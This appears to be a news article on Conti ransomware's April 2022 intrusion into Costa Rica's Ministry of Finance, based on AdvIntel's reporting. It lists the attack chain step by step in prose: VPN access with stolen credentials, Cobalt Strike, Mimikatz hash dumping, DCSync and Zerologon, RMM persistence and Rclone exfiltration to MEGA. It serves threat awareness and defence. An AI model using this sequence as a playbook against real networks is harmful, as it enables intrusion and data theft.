- Conti started its attack on the Costa Rican government on the 11th of April.
- The initial attack vector was compromised credential access via VPN.
- The president of Costa Rica declared a state of emergency and claimed that traitors helped hackers during the attacks.
The Conti ransomware group, emerged in 2020, gained significant notoriety with its successful attacks on Costa Rican government. It was also the group’s last attack before evolving into a new structure and starting working with other gangs. Before the Costa Rica attack, organizations from both the private and public sectors fell victim to its attacks.
5-day intrusion
Conti started its attack on the Costa Rica government on the 11th of April. The group used a system of Costa Rica’s Ministry of Finance as the entry point. A member, named MemberX, gained access by using a VPN connection and compromised credentials. According to the report published by AdvIntel, in the early stages of the attack, the group set up over 10 Cobalt Strike beacons. The initial attack vector for this operation was compromised credential access via VPN.
Name: Ministerio de Hacienda Costa Rica
Domain: hacienda.go.cr
Threat Actor Name: MemberX
Date(s): April 11, 2022
Timeline of Exploitation Operation: April 11, 2022 to April 15, 2022
According to the report, the group used the following methods:
- The infection followed a typical attack flow wherein the adversaries gained access from the compromised VPN log by installing a crypted form of Cobalt Strike inside the Costa Rica sub-network.
- The adversaries obtained local network domain administrator and enterprise administrator recon.
- The threat actors then performed network reconnaissance via Nltest domain trust enumeration, before scanning the network for file shares by leveraging the ShareFinder utility and AdFind from C:\ProgramData.
- The adversary (referenced by internal pseudonym “MemberX”) downloaded the fileshare output on their local machine via the Cobalt Strike channel.
- Then, the adversaries leveraged Cobalt Strike’s Mimikatz to dump logon passwords and NTDS hashes of the local machine users, obtaining plaintext and brute-forceable local admin, domain, and enterprise administrator hashes.
- The adversaries leveraged the enterprise user credentials to perform a DCSync and Zerologon attack. This effectively gained them access to every host on the Costa Rica interconnected networks.
- The adversaries then uploaded MSI scripts with Atera Remote Management Tool (RMM), the remote hosts selecting those with local admin access and less user activity. This established “anchoring” and safe return in case the threat actors’ beacons were burned or detected by the well-known EDR tool utilized by Costa Rica.
- The adversaries pinged the whole network and re-scanned the network domain trusts, leveraging enterprise administrator credentials with ShareFinder and compiling a list of all corporate assets and databases available under their new elevated privileges.
- On several network hosts, the adversaries also created a Rclone configuration file, which their data exfiltration tool leveraged as input with the MEGA Share uploader. They then began exfiltration from the network.
- The adversaries uploaded Process Hacker, Power Tools, and Do Not Sleep tools, and batch scripts filled in with the fileshare access locations.
The attacks caused Rodrigo Chaves Robles, the President of Costa Rica to declare a state of national emergency due to cyber attacks. He named them an act of terrorism and stated that the country was in a state of war, and that there was evidence that people were helping Conti from within Costa Rica. AdvIntel said,
« Given that the Costa Rican attacks were done partially as a form of symbolic closure for the Conti syndicate, this decision to stick with the toolkit that the group was renowned for feels intentional on the part of the threat actors, the anatomy of these hacks, as seen with the Ministry of Finance, was unmistakably in Conti’s signature attack style.
The notability and recognizability in Conti’s attack style also ultimately contributed to the group’s downfall, however. As Conti honed their attack methodology to a high degree of proficiency, defense and security agencies began to catch on to distinctive Conti method of operations, and develop mitigations for them. This is a contributing factor to the rise of more adaptive and personalized tactics being utilized by Conti’s successors, such as social engineering and complex phishing schemes. »